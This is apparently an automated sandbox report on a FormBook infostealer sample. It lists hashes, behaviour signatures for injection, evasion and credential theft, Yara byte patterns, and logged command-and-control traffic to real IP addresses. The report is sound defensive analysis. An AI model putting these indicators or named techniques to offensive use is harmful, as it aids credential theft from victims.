Windows Analysis Report
DOC092024-0431202229487.exe

Overview

General Information

Sample name:DOC092024-0431202229487.exe
Analysis ID:1509246
MD5:3a3b2034d8649f6112faa82e0daba310
SHA1:f3f9eb85d09171f0b92412cf5d4229d034f7417e
SHA256:e355fe9720526a9376e0557040f4d2e4eb0772a41b18c027403566500929f4e5
Tags:exe

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc.)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for reading data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file name differs from the original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • DOC092024-0431202229487.exe (PID: 6740 cmdline: "C:\Users\user\Desktop\DOC092024-0431202229487.exe" MD5: 3A3B2034D8649F6112FAA82E0DABA310)
    • svchost.exe (PID: 6844 cmdline: "C:\Users\user\Desktop\DOC092024-0431202229487.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • NZuQxWwOkTbZ.exe (PID: 732 cmdline: "C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • mstsc.exe (PID: 6940 cmdline: "C:\Windows\SysWOW64\mstsc.exe" MD5: EA4A02BE14C405327EEBA8D9AD2BD42C)
          • NZuQxWwOkTbZ.exe (PID: 3496 cmdline: "C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7156 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found

Source | Rule | Description | Author | Strings
00000001.00000002.1782440738.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000001.00000002.1782440738.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2f243:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x173d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.4144779638.0000000004330000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000003.00000002.4144779638.0000000004330000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2bec0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1404f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000001.00000002.1783144995.0000000003650000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

Source | Rule | Description | Author | Strings
1.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
1.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2e443:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x165d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
1.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
1.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2f243:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x173d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\DOC092024-0431202229487.exe", CommandLine: "C:\Users\user\Desktop\DOC092024-0431202229487.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DOC092024-0431202229487.exe", ParentImage: C:\Users\user\Desktop\DOC092024-0431202229487.exe, ParentProcessId: 6740, ParentProcessName: DOC092024-0431202229487.exe, ProcessCommandLine: "C:\Users\user\Desktop\DOC092024-0431202229487.exe", ProcessId: 6844, ProcessName: svchost.exe
Source: Process started | Author: vburov: Data: Command: "C:\Users\user\Desktop\DOC092024-0431202229487.exe", CommandLine: "C:\Users\user\Desktop\DOC092024-0431202229487.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DOC092024-0431202229487.exe", ParentImage: C:\Users\user\Desktop\DOC092024-0431202229487.exe, ParentProcessId: 6740, ParentProcessName: DOC092024-0431202229487.exe, ProcessCommandLine: "C:\Users\user\Desktop\DOC092024-0431202229487.exe", ProcessId: 6844, ProcessName: svchost.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-11T11:17:25.129349+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49736 | 81.88.63.46 | 80 | TCP
2024-09-11T11:17:49.106206+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 63320 | 217.70.184.50 | 80 | TCP
2024-09-11T11:18:02.763625+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 63324 | 172.96.187.60 | 80 | TCP
2024-09-11T11:18:15.905254+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 63328 | 3.33.130.190 | 80 | TCP
2024-09-11T11:18:29.322120+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 63332 | 67.223.117.189 | 80 | TCP
2024-09-11T11:18:43.806174+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 63336 | 147.92.40.175 | 80 | TCP
2024-09-11T11:18:56.954242+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 63340 | 3.33.130.190 | 80 | TCP
2024-09-11T11:19:10.107614+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 63344 | 3.33.130.190 | 80 | TCP
2024-09-11T11:19:23.495580+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 63348 | 3.33.130.190 | 80 | TCP
2024-09-11T11:19:37.159361+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 63352 | 85.153.138.113 | 80 | TCP
2024-09-11T11:19:50.920421+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 63356 | 104.21.11.31 | 80 | TCP
2024-09-11T11:20:04.080886+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 63360 | 188.114.97.3 | 80 | TCP
2024-09-11T11:20:17.882453+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 63364 | 3.33.130.190 | 80 | TCP
2024-09-11T11:20:32.268339+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 63368 | 206.119.82.134 | 80 | TCP
2024-09-11T11:20:45.747099+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 63372 | 65.21.196.90 | 80 | TCP
2024-09-11T11:21:00.793822+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 63376 | 38.181.141.122 | 80 | TCP
2024-09-11T11:21:10.103459+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 63377 | 81.88.63.46 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-11T11:17:25.129349+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 81.88.63.46 | 80 | TCP
2024-09-11T11:17:49.106206+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 63320 | 217.70.184.50 | 80 | TCP
2024-09-11T11:18:02.763625+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 63324 | 172.96.187.60 | 80 | TCP
2024-09-11T11:18:15.905254+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 63328 | 3.33.130.190 | 80 | TCP
2024-09-11T11:18:29.322120+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 63332 | 67.223.117.189 | 80 | TCP
2024-09-11T11:18:43.806174+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 63336 | 147.92.40.175 | 80 | TCP
2024-09-11T11:18:56.954242+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 63340 | 3.33.130.190 | 80 | TCP
2024-09-11T11:19:10.107614+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 63344 | 3.33.130.190 | 80 | TCP
2024-09-11T11:19:23.495580+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 63348 | 3.33.130.190 | 80 | TCP
2024-09-11T11:19:37.159361+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 63352 | 85.153.138.113 | 80 | TCP
2024-09-11T11:19:50.920421+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 63356 | 104.21.11.31 | 80 | TCP
2024-09-11T11:20:04.080886+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 63360 | 188.114.97.3 | 80 | TCP
2024-09-11T11:20:17.882453+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 63364 | 3.33.130.190 | 80 | TCP
2024-09-11T11:20:32.268339+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 63368 | 206.119.82.134 | 80 | TCP
2024-09-11T11:20:45.747099+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 63372 | 65.21.196.90 | 80 | TCP
2024-09-11T11:21:00.793822+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 63376 | 38.181.141.122 | 80 | TCP
2024-09-11T11:21:10.103459+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 63377 | 81.88.63.46 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-11T11:17:40.860929+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63317 | 217.70.184.50 | 80 | TCP
2024-09-11T11:17:44.027833+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63318 | 217.70.184.50 | 80 | TCP
2024-09-11T11:17:46.566841+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63319 | 217.70.184.50 | 80 | TCP
2024-09-11T11:17:55.140962+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63321 | 172.96.187.60 | 80 | TCP
2024-09-11T11:17:57.660795+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63322 | 172.96.187.60 | 80 | TCP
2024-09-11T11:18:00.220299+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63323 | 172.96.187.60 | 80 | TCP
2024-09-11T11:18:08.258289+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63325 | 3.33.130.190 | 80 | TCP
2024-09-11T11:18:11.092973+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63326 | 3.33.130.190 | 80 | TCP
2024-09-11T11:18:13.362343+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63327 | 3.33.130.190 | 80 | TCP
2024-09-11T11:18:22.311407+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63329 | 67.223.117.189 | 80 | TCP
2024-09-11T11:18:24.239922+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63330 | 67.223.117.189 | 80 | TCP
2024-09-11T11:18:26.797160+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63331 | 67.223.117.189 | 80 | TCP
2024-09-11T11:18:36.081007+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63333 | 147.92.40.175 | 80 | TCP
2024-09-11T11:18:38.649480+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63334 | 147.92.40.175 | 80 | TCP
2024-09-11T11:18:41.246867+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63335 | 147.92.40.175 | 80 | TCP
2024-09-11T11:18:49.314259+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63337 | 3.33.130.190 | 80 | TCP
2024-09-11T11:18:51.857060+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63338 | 3.33.130.190 | 80 | TCP
2024-09-11T11:18:54.378506+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63339 | 3.33.130.190 | 80 | TCP
2024-09-11T11:19:02.451571+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63341 | 3.33.130.190 | 80 | TCP
2024-09-11T11:19:05.018538+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63342 | 3.33.130.190 | 80 | TCP
2024-09-11T11:19:07.563352+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63343 | 3.33.130.190 | 80 | TCP
2024-09-11T11:19:15.625649+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63345 | 3.33.130.190 | 80 | TCP
2024-09-11T11:19:18.187779+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63346 | 3.33.130.190 | 80 | TCP
2024-09-11T11:19:20.725939+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63347 | 3.33.130.190 | 80 | TCP
2024-09-11T11:19:29.857744+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63349 | 85.153.138.113 | 80 | TCP
2024-09-11T11:19:32.000620+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63350 | 85.153.138.113 | 80 | TCP
2024-09-11T11:19:34.680405+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63351 | 85.153.138.113 | 80 | TCP
2024-09-11T11:19:43.318591+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63353 | 104.21.11.31 | 80 | TCP
2024-09-11T11:19:45.853997+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63354 | 104.21.11.31 | 80 | TCP
2024-09-11T11:19:48.378230+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63355 | 104.21.11.31 | 80 | TCP
2024-09-11T11:19:56.435701+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63357 | 188.114.97.3 | 80 | TCP
2024-09-11T11:19:58.982043+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63358 | 188.114.97.3 | 80 | TCP
2024-09-11T11:20:01.547658+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63359 | 188.114.97.3 | 80 | TCP
2024-09-11T11:20:10.230010+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63361 | 3.33.130.190 | 80 | TCP
2024-09-11T11:20:12.762486+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63362 | 3.33.130.190 | 80 | TCP
2024-09-11T11:20:15.332520+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63363 | 3.33.130.190 | 80 | TCP
2024-09-11T11:20:24.194165+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63365 | 206.119.82.134 | 80 | TCP
2024-09-11T11:20:27.186100+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63366 | 206.119.82.134 | 80 | TCP
2024-09-11T11:20:29.762687+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63367 | 206.119.82.134 | 80 | TCP
2024-09-11T11:20:38.047407+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63369 | 65.21.196.90 | 80 | TCP
2024-09-11T11:20:40.715590+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63370 | 65.21.196.90 | 80 | TCP
2024-09-11T11:20:43.199036+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63371 | 65.21.196.90 | 80 | TCP
2024-09-11T11:20:53.091857+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63373 | 38.181.141.122 | 80 | TCP
2024-09-11T11:20:55.058547+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63374 | 38.181.141.122 | 80 | TCP
2024-09-11T11:20:57.935818+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 63375 | 38.181.141.122 | 80 | TCP

AV Detection

Source: DOC092024-0431202229487.exe | Avira: detected
Source: DOC092024-0431202229487.exe | ReversingLabs: Detection: 23%
Source: DOC092024-0431202229487.exe | Virustotal: Detection: 29%
Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.1782440738.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4144779638.0000000004330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1783144995.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4144729578.00000000042E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4147103044.0000000004CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4143200808.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1783204016.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.4144609194.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: DOC092024-0431202229487.exe | Joe Sandbox ML: detected
Source: DOC092024-0431202229487.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: NZuQxWwOkTbZ.exe, 00000002.00000002.4143605796.000000000047E000.00000002.00000001.01000000.00000004.sdmp, NZuQxWwOkTbZ.exe, 00000005.00000002.4143319289.000000000047E000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: wntdll.pdbUGP source: DOC092024-0431202229487.exe, 00000000.00000003.1689587118.0000000004F70000.00000004.00001000.00020000.00000000.sdmp, DOC092024-0431202229487.exe, 00000000.00000003.1689806543.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1696144266.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1782791889.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1782791889.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1693222050.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000003.00000002.4144953095.00000000046BE000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000003.00000002.4144953095.0000000004520000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000003.00000003.1787130944.00000000041CD000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000003.00000003.1789604847.000000000437A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: DOC092024-0431202229487.exe, 00000000.00000003.1689587118.0000000004F70000.00000004.00001000.00020000.00000000.sdmp, DOC092024-0431202229487.exe, 00000000.00000003.1689806543.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1696144266.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1782791889.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1782791889.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1693222050.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, mstsc.exe, 00000003.00000002.4144953095.00000000046BE000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000003.00000002.4144953095.0000000004520000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000003.00000003.1787130944.00000000041CD000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000003.00000003.1789604847.000000000437A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mstsc.pdbGCTL source: svchost.exe, 00000001.00000003.1751655428.0000000006D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1751502120.0000000006B00000.00000004.00000020.00020000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000002.00000003.1725911829.0000000004047000.00000004.00000001.00020000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000002.00000003.1726302794.000000000418E000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: mstsc.exe, 00000003.00000002.4143406843.0000000002811000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000003.00000002.4145420454.0000000004B4C000.00000004.10000000.00040000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000005.00000000.1855702857.000000000289C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2074422264.000000001DF4C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: mstsc.pdb source: svchost.exe, 00000001.00000003.1751655428.0000000006D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1751502120.0000000006B00000.00000004.00000020.00020000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000002.00000003.1725911829.0000000004047000.00000004.00000001.00020000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000002.00000003.1726302794.000000000418E000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: mstsc.exe, 00000003.00000002.4143406843.0000000002811000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000003.00000002.4145420454.0000000004B4C000.00000004.10000000.00040000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000005.00000000.1855702857.000000000289C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2074422264.000000001DF4C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0072DD92 GetFileAttributesW,FindFirstFileW,FindClose | 0_2_0072DD92
Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_00762044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_00762044
Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0076219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_0076219F
Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_007624A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose | 0_2_007624A9
Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_00756B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose | 0_2_00756B3F
Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_00756E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose | 0_2_00756E4A
Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0075F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose | 0_2_0075F350
Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0075FD47 FindFirstFileW,FindClose | 0_2_0075FD47
Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0075FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf | 0_2_0075FDD2
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0265C460 FindFirstFileW,FindNextFileW,FindClose | 3_2_0265C460
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4x nop then xor eax, eax | 3_2_02649C00
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4x nop then pop edi | 3_2_0264E012
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4x nop then mov ebx, 00000004h | 3_2_044204DE

Networking

Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63347 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:63336 -> 147.92.40.175:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:63336 -> 147.92.40.175:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49736 -> 81.88.63.46:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49736 -> 81.88.63.46:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63359 -> 188.114.97.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63346 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:63368 -> 206.119.82.134:80
